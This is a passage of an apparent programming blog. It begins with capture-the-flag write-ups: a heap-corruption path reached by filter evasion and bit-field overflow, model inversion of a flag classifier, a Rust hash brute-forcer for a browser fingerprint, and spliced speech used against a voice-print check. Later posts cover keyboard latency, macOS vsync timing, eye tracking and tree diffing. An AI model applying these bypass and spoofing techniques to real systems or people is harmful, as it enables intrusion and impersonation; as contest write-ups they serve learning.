We found that it looked for emojis like tomato, pineapple and chicken as the pizza ingredients. If you ordered the Pineapple emoji as an ingredient, it yelled and banned you. We found other pineapple-related code at the cooking stage, so we needed to figure out how to get there without getting banned. Soon aegis figured out the cooking stage concatted the ingredients, so we could split the emoji’s UTF-8 over 2 ingredients to get it through.

Then aegis found a code path that could write to a buffer before and after it being free‘d, which could be the start of a heap corruption exploit. To get to that path we needed to make it think our pineapple pizzas were all an ApprovedPizza instead of a CriminalPizza.

So we found some bit field logic and aegis figured out that you could overflow the 4 bit fields and make it think all the pizzas were approved by cooking 16 pineapple pizzas and 1 tomato pizza. That let us corrupt the heap and get a segfault. Then kileak developed an exploit which he wrote up here.

Flagsifier

This one was tricky, it took me 4 hours of fiddling around in a Juypter Notebook.

We were given a Keras convnet image classifer model, some sample images showing 38 MNIST-like letters spelling random words glommed together, and the name “Flagsifier”. This suggested that the challenge was to extract an image of the flag from the model trained to recognize the flag.

First I Googled “MNIST letters” and found the EMNIST dataset, which I suspected is what the samples and training data was made with. Next, I had two possible avenues of extraction:

Use something like Deep Dream to optimize an image for flag-ness: this would take a reasonable amount of effort to implement and might work straightforwardly, but ran the risk of outputting blurry or otherwise unreadable images.
Use the letters in the EMNIST dataset to optimize a flag string for flag-ness character by character. This would definitely give a readable result, but I wasn’t sure if just hill-climbing a character at a time would reach the flag properly, since the final dense layer could theoretically learn not to activate basically at all until all the characters are right.

I figured that the second approach had a better effort to expected reward tradeoff and started work. First I set up the data loading code for the EMNIST dataset and extracted only the capital letters (the samples were all uppercase). Then I extracted the first letter from a sample and searched the dataset for it, confirming that the letters were from EMNIST. Later I figured out based on the “L”s in the samples that I needed to use the ByMerge version rather than the ByClass version and switched it.

Next I wrote a function that took a 38-character string and generated an image with random instances of each letter so that I could run things through the network. I needed to figure out which of the 40 class outputs was flag-ness, without having the flag.

The examples I had run through so far had all output 1.0 for one class and 0.0 for others, I figured first I needed more resolution to pick up on hints of flag-ness. To get this I needed to remove the final softmax layer. Unfortunately Keras compiled the model using settings only available inside the load command, so it wasn’t easy to modify it after loading. I took the easy/clever/hacky/fastest way out and opened the model in a hex editor, found the JSON model description inside and changed "softmax", to "linear" , with the space to maintain the length. This gave me a much higher resolution signal to look at and optimize.

I knew that all flags started with OOO so I composed an image with OOO and then blank space, and saw that channel 2 (zero-indexed) had the highest activation.

I started by looping through each character for each position starting from the beginning and filling it with the character that had the highest activation, using my same generator that picked random instances. This gave garbage results, so I made it average the activations of 20 samples for each character and it correctly picked up the OOO and then a bunch of random-seeming characters.

I rewrote my generator and optimizer to pick 30 random versions of each letter for each position and choose the best letter instance for each slot. Then I rewrote it again so it could start from a given string instead of an empty blank canvas. Then I re-ran the optimizer again starting with my last result and it tuned in each character with context.

This gave me OOOSOMGAUTHKNTICIWTTILIGCWCCISRTQUIVCT. That looked like the first part might be OOOSOMEAUTHENTIC, it was getting somewhere! So I posted it to the Samurai Slack channel. I was somewhat tapped out of ideas and my teammate wanted to try Deep Dream, so I tried a bit harder to get the best guess of a starting point for Deep Dream to optimize. I noted that the ByMerge dataset meant L and I were nearly indistinguishable, and given that and the context of an AI challenge it probably continued OOOSOMEAUTHENTICINTELLIGENCEIS. I couldn’t decipher the last bit though so I prepared to wait for the deep dream results.

Then I got a Slack ping that the challenge had been solved, my teammate shane figured out that the last bit RTQUIVCT must be REQUIRED! We had managed to turn the garbled mess into the full flag.

Geckome

In this challenge there was a page with Javascript that collected a bunch of info from the browser, put it all in a string, hashed it, and if it had the correct hash, passed it off to a PHP file that would give you the flag given the string.

We started by looking at the various Javascript, CSS and HTML features used on the page and tabulating which versions of which browsers could possibly have that combination of features, and came up with this table:

Thing           Firefox Chrome  Opera   Safari
onbeforeprint   <6      <63     <50     any
DataView        >=15    >=9     >=12.1  >=5.1
webkit anim     X       >=4     >=15    >=4
SubtleCrypto    >=34    >=37    >=24    >=11
link prerender  X       >=13    >=15    X
video tag       >=20    >=4     >=11.5  >=4
ping attr       X       >=15    >=15    >=6

The version expressions for onbeforeprint are
the browsers that don't support it, as suggested.

This didn’t do much except rule out Firefox and Safari. We could also probably rule out Opera because it’s rare, and the challenge was named “Geckome” which had “ome” from Chrome, but nothing from Opera. But there were still too many Chrome versions.

I modified the script to put all the important values to hash on the screen so that we could easily look at the results in different browsers:

<pre id="log"></pre>
<script>
    var logText = "";
    function logme(thing,s) { logText += thing; logText += ": "; logText += String(s); logText += ";\n";}

    var f = "";
    if (navigator.onLine)
        f += "o";
    logme("online", navigator.onLine);
    f += navigator.vendor;
    logme("vendor", navigator.vendor);
    function p() {
        window.print();
    }

    f += navigator.mimeTypes.length;
    logme("mimes", navigator.mimeTypes.length);
    x=0; for ( i in navigator ) { x += 1; } f += x;
    logme("navlen", x);
    x=0; for ( i in window ) { x += 1; } f += x;
    logme("winlen", x);
    // hash
    function str2ab(str) {
        var buf = new ArrayBuffer(str.length*2); // 2 bytes for each char
        var bufView = new Uint16Array(buf);
        for (var i=0, strLen=str.length; i<strLen; i++) {
            bufView[i] = str.charCodeAt(i);
        }
        return buf;
    }
    function sha256(str) {
        // We transform the string into an arraybuffer.
        var buffer = str2ab(str);
        return crypto.subtle.digest({name:"SHA-256"}, buffer).then(function (hash) {
            return hex(hash);
        });
    }

    function hex(buffer) {
        var hexCodes = [];
        var view = new DataView(buffer);
        for (var i = 0; i < view.byteLength; i += 4) {
            // Using getUint32 reduces the number of iterations needed (we process 4 bytes each time)
            var value = view.getUint32(i)
            // toString(16) will give the hex representation of the number without padding
            var stringValue = value.toString(16)
            // We use concatenation and slice for padding
            var padding = '00000000'
            var paddedValue = (padding + stringValue).slice(-padding.length)
            hexCodes.push(paddedValue);
        }

        // Join all the hex strings into one
        return hexCodes.join("");
    }
    if(navigator.plugins.length > 0) {
        logme("plugin0name", navigator.plugins[0].filename);
        logme("plugin0desc", navigator.plugins[0].description);
    }
    if(navigator.plugins.length > 1) {
        logme("plugin1name", navigator.plugins[1].filename);
        logme("plugin1desc", navigator.plugins[1].description);
    }
    f += navigator.plugins[0].filename;
    f += navigator.plugins[1].description;

    logme("f", f);

    sha256(f).then(function(digest) {
        logme("digest", digest)
        if (digest == "31c6b7c46ff55afc8c5e64f42cc9b48dde6a04b5ca434038cd2af8bd3fd1483a") {
            logme("flag", "gotit!");
        } else {
            logme("flag", "fail!");
        }
        document.getElementById('log').innerHTML = logText;
    });
</script>

I then hosted a version of this and used BrowserShots to take screenshots of it in many versions. Most crashed for lack of various APIs/values and none were correct.

My next idea was to brute force the hash by trying all the reasonable combinations of numbers and plugin strings.

I spent an hour writing a Rust program to brute force it that computed the strings and digests in the same way, including UTF-16 conversion and converting to hex. Then I checked that it could find the values for my browser’s digest. I entered a lot of possible plugin values and reasonable ranges for numbers based on the browser screenshots, but couldn’t find the correct one despite searching millions of combinations.

So, I gave up. Then later got a Slack ping that my teammate nopple had solved it. He had taken my Rust program and added some extra plugin strings I had missed from the browser screenshots (libpepflashplayer.so turned out to be the key).

extern crate byteorder;
extern crate sha2;

use sha2::{Sha256, Digest};
use byteorder::{LittleEndian, WriteBytesExt};
use std::fmt::Write;

fn to_utf16(s: &str) -> Vec<u8> {
    let mut out = Vec::with_capacity(s.len()*2);
    for point in s.encode_utf16() {
        out.write_u16::<LittleEndian>(point).unwrap();
    }
    out
}

fn to_hex(bytes: &[u8]) -> String {
    assert_eq!(bytes.len(), 32);
    let mut s = String::with_capacity(64);
    for byte in bytes {
        write!(&mut s, "{:02x}", byte).unwrap();
    }
    s
}

fn hash(bytes: &[u8]) -> String {
    let mut hasher = Sha256::default();
    hasher.input(bytes);
    let output = hasher.result();
    to_hex(output.as_slice())
}

#[derive(Debug)]
struct Browser {
    online: bool,
    vendor: &'static str,
    mimes: u16,
    navs: u16,
    wins: u16,
    plug_name: &'static str,
    plug_desc: &'static str,
}

fn construct_f(b: &Browser) -> String {
    let mut s = String::with_capacity(64);
    if b.online { s.push('o'); }
    s.push_str(b.vendor);
    write!(&mut s, "{}", b.mimes).unwrap();
    write!(&mut s, "{}", b.navs).unwrap();
    write!(&mut s, "{}", b.wins).unwrap();
    s.push_str(b.plug_name);
    s.push_str(b.plug_desc);
    s
}

// Test target that's my browser
// const TARGET: &'static str = "31504a9568837f94e9f0afe8387cf945fb4929b81e53caf16bdf65c417e294e0";
// Real target
const TARGET: &'static str = "31c6b7c46ff55afc8c5e64f42cc9b48dde6a04b5ca434038cd2af8bd3fd1483a";

fn test(f: &str) -> bool {
    let utf16 = to_utf16(f);
    let hex_hash = hash(&utf16[..]);
    assert_eq!(hex_hash.len(), 64);
    hex_hash == TARGET
}

struct ForceConfig {
    navs_start: u16,
    navs_end: u16,
    wins_start: u16,
    wins_end: u16,
}

const PLUGNAMES: &'static [&'static str] = &[
    "internal-remoting-viewer",
    "internal-pdf-viewer",
    "widevinecdmadapter.plugin",
    "PepperFlashPlayer.plugin",
    "internal-nacl-plugin",
    "libpdf.so",
    "pepflashplayer.dll",
    "Flash Player.plugin",
    "WebEx64.plugin",
    "CitrixOnlineWebDeploymentPlugin.plugin",
    "googletalkbrowserplugin.plugin",
    "AdobePDFViewerNPAPI.plugin",
    "libpepflashplayer.so",
];

const PLUGDESCS: &'static [&'static str] = &[
    "",
    "This plugin allows you to securely access other computers that have been shared with you. To use this plugin you must first install the <a href=\"https://chrome.google.com/remotedesktop\">Chrome Remote Desktop</a> webapp.",
    "Portable Document Format",
    "Enables Widevine licenses for playback of HTML audio/video content. (version: 1.4.9.1070)",
    "Plugin that detects installed Citrix Online products (visit www.citrixonline.com).",
    "Shockwave Flash 9.0 r0",
    // SNIPPED: versions 10 through 28. These didn't end up being necessary.
    "Shockwave Flash 29.0 r0",
];

fn force(c: &ForceConfig) {
    let num_navs = (c.navs_end-c.navs_start) as usize;
    let num_wins = (c.wins_end-c.wins_start) as usize;
    let max_mime: u16 = 15;

    let total = num_navs*num_wins*(max_mime as usize-1)*PLUGNAMES.len()*PLUGDESCS.len();
    println!("Brute forcing {} combinations", total);

    let one_segment = total / 100;
    let mut tick = 0;

    for navs in c.navs_start..c.navs_end {
        for wins in c.wins_start..c.wins_end {
            for mimes in 1..max_mime {
                for plug_name in PLUGNAMES {
                    for plug_desc in PLUGDESCS {
                        let b = Browser {
                            online: true,
                            // vendor: "",
                            vendor: "Google Inc.",
                            // vendor: "Opera Software ASA",
                            mimes, navs, wins, plug_name, plug_desc,
                        };
                        let f = construct_f(&b);
                        let good = test(&f);
                        assert!(!good, "{:?}", b);

                        tick += 1;
                        if tick % one_segment == 0 {
                            println!("Done {}/{}", tick, total);
                        }
                    }
                }
            }
        }
    }
}

fn main() {
    let conf = ForceConfig {
        navs_start: 8,
        navs_end: 58,
        wins_start: 80,
        wins_end: 270,
    };
    force(&conf);
}

AdamTune

This challenge involved passing a “voice print” test where you submitted an MP3 file that was allegedly Adam Doupé reading a sentence.

My teammates spent some time playing with training a text to speech model on a small hand-labeled dataset but that didn’t produce good enough results and at 4 hours till the end of the contest we agreed there’s no way it could work in time.

By recording challenges from the demo server, I discovered that a vocabulary of about 209 words completely covered most challenges. So we decided to try a concatenative approach. My teammates downloaded the audio for a bunch of Adam’s talks and gave me cut up mono wav files. I fed these through the Google Speech To Text API and got word level timing information. I wrote a script that cut out wav files of individual words in the vocabulary from the transcript, a script that picked out the best instances of these words based on length and volume, and a script that strung together the best instances into sentences.

However, the results sounded really bad. A lot of the words were said quickly or muttered or included bits of other words, the results ended up being really difficult to understand.

I submitted it anyway and it actually passed the check that it said the right words, but failed the classifier that it was Adam. This was the opposite of what I expected, since it was Adam but didn’t sound like it was saying the sentence cleanly.

Looking at the source after the contest, it seems the approach used in it is very similar except with the Watson speech API, which gives word-level confidences Google doesn’t, allowing better filtering, and also might give better timestamps for less choppy cutouts.

My other guess for why we failed the classifier is that we used clips from Adam’s livestreams doing pwnables instead of from his CS lectures, these sound very different because of different microphones and styles of speaking. We chose the pwnables because the audio was higher quality, but if the classifier used only lectures then that could easily explain why we failed the classifier.

Fixing My Keyboard's Latency

2017-12-29T00:00:00+00:00

While discussing Dan Luu’s keyboard latency experiments I realized that I had never tested my keyboard’s latency. I use a custom keyboard I designed and built, but when I wrote the firmware I was focused on getting it working and didn’t pay any attention to latency. When I took a look at the source code and immediately saw a 10ms delay that was there for no other reason than paranoia, I knew I was in for some fun.

After a bunch of measuring, finding and squashing sources of latency, I managed to improve the latency of the main loop from 30 milliseconds to 700 microseconds. I then added a feature that changed the colour of the keyboard’s RGB LEDs on every key press so that I could use the Is It Snappy app with my iPhone’s high speed camera mode to do some latency testing.

The first thing I found was that with my improved firmware the end to end latency of typing a character in Sublime Text and XCode 9 near the top of my Macbook display is around 42ms¹. This is pretty good, but the astonishing thing is that it means that before I fixed the firmware my keyboard used to account for almost half of my end-to-end typing latency. This is measuring from the LED colour change so it doesn’t count the around 15ms¹ according to my testing from starting to press one of my keys the switch activating.

I also tested my Macbook keyboard, as well as a few older low speed USB Apple keyboards, and found that they had around 67ms¹ of end-to-end latency, measuring from when the switch was fully depressed while hitting the key as fast as I could. I suspect part of the reason for this is that these keyboards only poll at 8ms and 10ms intervals according to USB Prober (an old Apple dev tool), whereas the Teensy in my custom keyboard polls every millisecond. According to Dan’s post newer Apple external keyboards also poll at 1000hz.

Note that the 700us main loop doesn’t translate into 700us switch-to-USB latency, since the USB transfer is done asynchronously via DMA by the Teensy’s USB controller when it is polled, which happens at 1000hz.

It’s interesting that I used my keyboard for 3 years without noticing that it added 30ms of latency. I have a few guesses why:

Although I can perceive 30ms of latency in a comparison test, I have to pay attention, my keyboard having 30ms of extra latency just made it feel different, but that’s unsurprising since it was different in a bunch of ways.
My only comparison was other high-latency keyboards, like my Macbook’s. 30ms of latency difference is more perceptiple than 5-10ms.

Anyhow here’s how I managed to bring the latency down from 30ms to 700us:

I added some measurement code that printed the time spent in the main loop to the Serial console after every key press. This gave me the 30ms figure.
I removed the 10ms delay in the main loop, and everything still worked.
I searched for other delays and found one 2ms one between enabling a row for scanning and reading it, which I removed with no apparent consequences. I added back in a 2 microsecond delay just in case.
I had tried to make the display on my keyboard only update when it changed, but I messed this up somewhere else and it was taking 5ms to update on every key press.
The right half of my keyboard is scanned using an I/O expander over i2c since I didn’t have enough pins on the Teensy. This is the same way the two halves of the Ergodox work. Based on some Ergodox firmware I saw, I reinitialized the direction registers of the I/O expander before every scan, just in case. Unfortunately this added 2ms and wasn’t really necessary since unlike the Ergodox you can’t disconnect the second half of my keyboard with a cable.
Now my loop was taking 3.8ms which was almost entirely the i2c communication with the I/O expander. A friend recommended I check out nox771’s fast i2c library. Unfortunately, it wouldn’t compile on the super old version of the Arduino/Teensyduino software I was using. I decided to upgrade, and after several hours in C++ compilation hell and accounting for a few changes, it worked. I bumped the i2c frequency up to 1.8 megahertz and now my loops took 700us!
Now I started running into bouncing problems that lead to the occasionally doubled letter, so I needed to implement debouncing. Some ways of implementing debouncing add latency but that’s totally unnecessary. I implemented a simple technique that sends transitions immediately and then doesn’t update a key for 5ms after.

The specifics are only relevant to other people building keyboard firmware, especially the fast i2c one which I don’t think most ErgoDox firmwares use. But I think it’s interesting to see how easy it was to improve the latency of software that wasn’t designed for it with only a few hours work.

I use an iPhone 5S, which can only record at 120fps, so while these numbers are consistent over multiple measurements, they may be off by as much as 8ms. ↩ ↩² ↩³

CVDisplayLink Doesn't Link To Your Display

2017-12-09T00:00:00+00:00

Edit 2017/12/10: So I screwed up, I thought I was safe confirming it in two different ways but I was using an external monitor and all of the below is accurate only for a specific multi-monitor case. Skip to the bottom to read about my new results.

CVDisplayLink is the recommended way to synchronize your drawing/animation with the refresh of the display on macOS. Many people assume it calls your app just after each display vsync event, unfortunately this isn’t the case at all. CVDisplayLink just fetches the refresh rate of your display, and sets a high resolution timer to call you every 16.6ms (for a 60hz display).

The major reason this is important is if your app has inconsistent rendering times and you get unlucky with the phase of your events, you’ll end up painting twice in some frames and zero times in others, leading to visible dropped frames in your animations. As illustrated by @jordwalke on Twitter:

This is particularly insidious because depending on how variable your draw times are, a lot of the time you’ll end up with consistent drawing, but every N runs it will be really bad. Even worse, your FPS measurements will still show 60fps because you’re still drawing every 16.6ms.

Also, if you’re using this for a game loop where you only process input at the start of every frame, you could have close to an entire extra frame of latency if you’re unlucky at startup.

“But it’s a special thing that has ‘display’ and ‘link’ right in the name, surely it must link up to the display vsync events!” you might say. That’s what I thought too until I talked to @pcwalton at a Rust meetup and he said he’d disassembled CVDisplayLink and found it was just a timer. This was astonishing to me and I sat on this information somewhat skeptical for a while. But, today I finally got around to doing a bunch of investigation and found that he’s right and CVDisplayLink does not link to the vsync.

First, I disassembled the CoreVideo framework where CVDisplayLink resides and found a bunch of code that fetches the display rate, calculates how often the timer should be triggered and waits on a timer. I didn’t find any code that looked for vsync events.

Next, I did some experiments, because I might have missed some hidden synchronization. I used Kris Yu’s Water Metal sample app since that’s sadly the only macOS Metal sample code I could find that built for me. I then disassembled MTKView and confirmed that as I suspected it just uses CVDisplayLink to call your draw method. Then I added kdebug_signpost calls in the draw method so that I could use Instrument’s “Points of Interest” trace combined with the new display vsync information to see how they line up.

What I found is that as one would expect with a timer, within each run the draw call happens at a consistent time within the frame, but between different runs the draw call happens at completely different times depending on the phase the CVDisplayLink starts up in relation to the display vsync.

Here’s some screenshots of different runs in Instruments. The red boxes on the bottom are the draw call, and the vsync display intervals are clearly visible as lining up very differently each run:

Now, the real question is, what do you do if you want actual vsync alignment? I actually don’t know, I haven’t done enough research yet, but I have some ideas that may or may not work:

I think Cocoa animation or Core Animation draw callbacks may actually be linked to display vsync, in which case you can use those. I’m not sure though.
OpenGL vsync might synchronize with the real vsync.
Somehow Instruments gets at the real vsync times, they might come from a private API, but it also might be something public.
There may be some other API I don’t know about.

Note that I haven’t tested CADisplayLink on IOS, but I’ve heard it works properly. Anyway, if you know anything about this issue or how to do things properly, email me at tristan@thume.ca! I may update this post if I learn anything new.

Edit 2017/12/10: I was wrong, sorry

@ametis_ on Twitter noted that the internal CVCGDisplayLink::getDisplayTimes method actually accesses a pointer to a StdFBShmem_t. I poked around some more and confirmed that the shared memory for this is indeed mapped in in the initializer. I figured I might miss something like this, hence why I did the experiments. This shared memory contains real vsync times, and is apparently a way to get real vsync information from the Kernel. See this StackOverflow post for an example of code that maps it in. The question is, why do my experiments show that it still doesn’t line up with vsync?

The MTKView I was testing with uses CVDisplayLinkCreateWithActiveCGDisplays which if you have multiple displays creates a CVDisplayLink “capable of being used with all active displays”, i.e it doesn’t use vsync. I was using an external monitor for my tests, there’s nothing on my laptop display but I leave it open because there’s a hardware issue where it messes with my trackpad if I close it. In this case a smarter CVDisplayLink could handle this case fine by realizing that only one of my displays was updating at the time, but it turns out it falls back to a timer.

I re-did my experiments in Instruments on my laptop display and found that it consistently fired the draw call half-way into the frame, about 7ms from the next vsync. I don’t know why it does it in the middle rather than the start, but at least it was consistent across 6 runs.

So, basically this article is mostly wrong, provided you only have one display. You still have to worry about jank due to inconsistent frame times on a single monitor if you don’t have GL/Metal vsync enabled and your frames jitter around 7ms though. And if you want events near the start of vsync you may still have a difficult task ahead of you.

It’s probably even possible to get the correct events in a multi-monitor case, but you need some fancy code that watches which screen your monitor is on, and constructs a new CVDisplayLink with just that CGDisplay when the window moves.

Interestingly, @ametis_’s account was created just for that tweet, and figuring out that it uses StdFBShmem_t without a hint would have required way way better reversing skills than mine to trace the instance variable back to the init method through a bunch of offsets to a memory mapping of an opaque code, which they would have had to figure out is kIOFBSharedConnectType and look at that struct to find it contains the vblTime field. Either they’re really good at reverse engineering, or they’re an Apple engineer with access to the source code who looked into it after seeing my article. Regardless I’m happy they set me straight!

Thanks to other commenters on Hacker News and Twitter have pointed out a few things that I should add here:

Someone on HN notes that the Apple docs don’t promise that CVDisplayLink gives you refresh times. I had noticed this but didn’t include it in my article, but I treated it as further evidence for my results though. Ooops, turns out it does sometimes, just not always.
@jordwalke linked me to this article that explains how CADisplayLink works on IOS.

Eye Tracking Mouse Control Ideas

2017-11-10T00:00:00+00:00

This is a list of ideas for using eye tracking as a mouse replacement, specifically solving the problem that eye tracking often isn’t quite accurate enough to use raw. There’s lots of targets on a normal computer that are just too small for even the best fingertip-size eyetracker accuracies, like selecting individual characters, or small buttons. For some people, like me, eye trackers tend just not to work too well and only are accurate within maybe a 4 cm diameter, much too large to specify most targets.

There’s also reason to suspect that this situation won’t improve. People have been working on eye tracking for years and accuracy is still bad. A few papers I’ve read have said that in fact the muscles that point the eyes may even not be accurate enough to point as precisely as a mouse, and even if they can that fixating gaze precisely leads to eye fatigue quite quickly.

Why would you want to replace the mouse with an eye-tracking based solution?

Disabilities
Repetitive Stress Injuries: There’s lots of approaches to addressing RSIs, but it’s also a much larger market.
People who don’t want to take their hands off the keyboard: Programmers go to crazy lengths to learn shortcuts to avoid reaching for the mouse, if there was a fast system of hands-free mousing, some may like it.

I’m writing this list for two reasons:

So that I can get the WaybackMachine to archive it to have evidence of prior art in case anybody tries to patent these. I try to explore as much of the space of possible ideas people could try patenting as possible. Of course, it’s possible one or more of these already falls under some patent, because there’s patents on a lot of obvious ideas, but I don’t know of any.
As a survey of the possibilities, to look at what’s possible and possibly inspire someone to try something out. Eye tracking has such potential, but is sadly rarely used outside of research.

Before proceeding I’d like to emphasize that not all these ideas are good, many wouldn’t be that nice to use or would have other issues, I aimed much more for breadth in creating this list than depth.

There’s three broad categories to these ideas:

Combining with another input method

There’s a lot of alternative mousing methods that work but are quite slow. But, if you use eye tracking for coarse but fast narrowing of position, and then another technique for refinement, they can be quite efficient.

Polymouse: Using head tracking for refinement and eye tracking for large movements, you can achieve speeds equal to a good trackpad and approaching a normal mouse. This is the main technique I’ve put effort into and was the focus of my research at the Waterloo HCI lab. I use a version of the “Animated MAGIC” technique to quickly move the mouse cursor along the path to the target based on eye tracking. I’m currently working towards making this technique available in a low-cost and convenient system for daily use.
Combining with a mouse: This just allows you to use less mouse movement. This is built into Tobii’s consumer software.
Combining with voice: There’s a lot of things on a screen to click, and it’s hard to describe them, but given a small region from eye tracking, you can use OCR or accessibility APIs to find interactible things near the gaze and disambiguate what to do via voice. For example “click find” when looking near the “Find file” button on Github.
Combining with a keyboard: Within a region around the eye, you could offer a number of options for things to interact with, presented as letters or colours overlayed on the screen, and then use different keyboard keys to select which one was the true target. The places to put the markers could be done via a pattern, machine learning, text recognition or an accessibility API. Similar to this.
Combining with button timing: When the click button is pressed, instead of emitting a click event it could start move the cursor in for example a grid or spiral pattern around the gaze location, and when the user releases it clicks in that location. This could also be combined with likely target data, see the next section. This would be slow but doesn’t require extra hardware, it uses timing information as the additional source.
Face Gestures: Camera data could be fed into a face tracking algorithm and face gestures could be used to refine the cursor position. For example moving the lips around like a joystick, or twitching cheeks to nudge left and right. Most eye trackers are actually just IR cameras so this may not even require a separate camera.

Predicting the target

When you have eye tracking data that is fairly good but not perfect, the effective accuracy can be improved by guessing good targets within the gaze region.

Good targets can be things like buttons, words to select, and other UI controls. Even when some place is interactible, it may make sense to choose a better target anyway, for example preferring selecting entire words rather than characters within a word, and the right side of a tab targetting the close button and the left side targetting clicking the tab.

Given a source of information about likely targets, there’s various things you can do with the information:

Snapping: The gaze cursor or clicks snap to the nearest likely target. Possibly with snappiness determined by a measure of likelihood of clicking the target.
Draw the cursor towards it: This is basically a softer form of snapping. It could be like gravity, or fancier. For example modelling the gaze data as a probability distribution over true targets, and target information as a prior distribution, and then using Bayesian calculations to find the maximum likelihood target. I think I prefer the simpler and more consistent idea of snapping though.

There’s a few ways I can think of getting the target information, a system could use either one or many of these:

Use accessibility APIs: Accessibility APIs can tell you the pixel location of buttons, text and other likely targets.
Likelihood Neural Net: Use machine learning (probably a CNN) to train a model that given a screenshot, predicts a likelihood distribution (think heatmap) of click targets. It could be trained on data from recording a screenshot and the mouse position on every click during normal computer use.
Prediction Neural Net: Similar to the above, but using Gaze data. A model would be trained on the gaze location and screen contents to predict the true mouse click target. One way to do this would be to feed the net patches of the screen centered on the gaze target. Training data would be gathered by saving data from every click and training on the true click position.
Classical Computer Vision: There’s a number of possible computer vision techniques that could be used to identify targets without machine learning. For text anything from full OCR to algorithms that detect where text is without recognizing it (like in my KeySelect demo). Buttons also often have text, but controls could also be recognized using image patches recognized from previous clicks. You could even use heuristics like “coloured things” or “visually complex things”.

Disambiguate with just gaze

It’s also possible to disambiguate targets with gaze alone, but this generally requires modifying or overlaying on the screen targets to manipulate the gaze.

Magnifying: The simplest one is just magnifying the error around the gaze, either continuously or on dwell. This allows the user to refine their gaze on larger targets. The magnification can be either a rectangle or something fancier like a fisheye.
Moving Markers: Similar to keyboard disambiguation, overlay likely targets with a marker that moves around in some pattern. Check if the gaze data is following one of the patterns. This works because eye trackers are better at detecting direction and timing of motion than absolute position. See the Orbits paper for an example of this kind of system.
Moving Distortion: Similar to the previous except instead of markers, distort the screen are around the gaze in a moving pattern where different parts move in different patterns. Then the user just follows what they want to click with their gaze.
Eye Gestures: Extra eye movements could be used to refine the position. For example darting the eyes in a position could nudge the cursor in that direction relative to where it was before the dart. Or winking an eye could move it left or right a small amount.

How to click

Clicking is a separate issue, but there’s also lots of possibilities here:

Using a button: This could be a normal mouse or any other button.
A foot pedal
Dwell clicking
Mouth noises: This is what I tried in my research, see PopClick
Face, head or eye gestures
Voice recognition
A keyboard

Conclusion

Like I said, this was originally written primarily as prior art for patents. But I hope it was at least somewhat interesting to think about the numerous possibilities for eye tracking as a mouse replacement, even if a lot of the ideas have issues.

Designing a Tree Diff Algorithm Using Dynamic Programming and A*

2017-06-17T00:00:00+00:00

During my internship at Jane Street¹, one of my projects was a config editing tool that at first sounded straightforward but culminated in me designing a custom tree diffing algorithm using dynamic programming, relentlessly optimizing it and then transforming it into an A* accelerated path finding algorithm. This post is the story of the design and optimization of the algorithm, of interest to anyone who needs an algorithm for diffing trees, or who just wants an in-depth example of the process of solving a real-world problem with a custom non-trivial dynamic programming algorithm, and some tips on optimizing one while maintaining understandability, or anyone who just wants to read a cool programming story and maybe learn something.

Background: Description of the problem I was solving.
The Heuristic Approach: My initial attempt at a simple algorithm, and why it was insufficient.
A Tree Diff Optimizer: Rethinking the problem as finding the optimal resulting tree diff.
Dynamic Programming: Background on using the correspondence between memoizing recursion and path finding on a grid to find solutions to problems like Levenshtein distance.
The Algorithm: Extending Levenshtein distance with two grids and recursion.
Profiling and Optimizing: Relentless profiling and optimizations to reduce run time.
Path Finding: Using A* to make the run time proportional to the difference rather than tree size.
Example Implementation: Analysis of the effectiveness and costs of A* on Levenshtein distance, sequence alignment and diffing problems, with open source example code.

Background

Jane Street has a lot of config files for their trade handling systems which use S-expressions (basically a tree with strings as leaves). They often want to make changes that will only apply on certain days, for example days when markets will act differently than normal like elections and option expiry dates. To do this their config processor knows a special construct that is like a switch statement for dates, it looks something like this:

(thing-processor-config
  (:date-switch
   (case 2017-04-07
    (speed 5)
    (power 7))
   (else
    (speed 3)
    (power 9))))

The semantics are that any :date-switch block has its branches checked against the current date and the children of the correct branch are used in place of the :date-switch in the config structure. Note that each branch can contain multiple sub-trees.

Now, just that small example took a while for me to type and get the indentation correct. People at Jane Street are frequently making edits where they just want to quickly change some numbers but have to make sure they get the syntax and indentation right and have everything still look nice. This is begging for automation!

So they asked me to write a tool that would allow people to just edit the file and run a command, and it would automatically scope their changes to the current day, or a date they specify, by detecting the differences between the current contents on disk and the committed contents in version control.

When I first heard the problem, it sounded pretty easy and I thought I’d be done within a few days, but I discovered a number of catches after starting and it ended up taking 5 weeks. This sounds like we maybe should have abandoned it when we discovered how complex it was, but given how much time expensive people were spending doing these edits, sometimes under time pressure when every extra minute had a high cost, it was worth it to get it right.

The first thing I discovered is that they had a library for parsing and serializing s-expressions while preserving indentation and comments, but it didn’t cleanly handle making structural modifications to the parse tree. Before even starting the rest of the project I had to write a library that provided a better data model for doing this and having the result be nicely indented.

Next, the real syntax for these date switch blocks is more complicated than my description and has a static constraint where the branches must cover every date in the current context and no more, including when nested inside other switches. I also didn’t want edits to :date-switch blocks to themselves be scoped to a date, since that would create invalid syntax. This required I parse my earlier style-preserving representation into one that computed date context and represented :date-switch blocks specially in an Abstract Syntax Tree (AST) as well as transform back from my representation to the one I could output.

Now finally I was ready to start on the actual algorithm. The basic task my script had to do was take two trees and wrap differing sub-trees in a :date-switch block with the old contents in one branch and the new contents in the other branch. The thing is, there are many ways to do this. The switch can be placed at many different levels and there may be multiple edits and it’s not specified how to group them. Technically it could just add a :date-switch at the top level with the old file in one branch and the new file in another, but that wouldn’t be very satisfying, just like how technically the diff command could just output the entire old file prefixed with - and then the new file prefixed with +, but then nobody would use it. I needed an algorithm that gave reasonable-looking and compact changes for real-world edits. It shouldn’t double the file size in an enormous :date-switch when only a single number changed.

The Heuristic Approach

If you just want to read about the optimal algorithm and not why one was necessary you can skip this section.

First, I came up with a simple algorithm that I thought would work in almost all real-world cases. I simply recursively walked down the tree until I got to either a leaf that was different or a node that had a different number of children, and then it would put a :date-switch at that level.

This didn’t produce the most satisfying results, it was okay for changes to leaves, but as soon as you added or removed a child from a list, it would duplicate most of the list when it could have taken advantage of the ability to have a different number of children in each branch.

It produced this:

(:date-switch
 (case 2017-04-07
  (foo
   qux
   ; ... 1000 more lines ...
   baz))
 (else
  (foo
   ; ... 1000 more lines ...
   baz)))

When we really would have preferred:

(foo
 (:date-switch
  (case 2017-04-07 qux)
  (else))
 ; ... 1000 more lines ...
 baz)

Luckily, this was easy enough to solve since Jane Street already had an OCaml library implementing the Patience Diff algorithm for arbitrary lists of comparable OCaml types. When I had two lists of differing length, I simply applied the Patience Diff algorithm and placed :date-switch blocks based on the diff.

This algorithm worked okay for cases of a single edit, but we wanted the tool to work with multiple edits, and for those it still often produced terrible results.

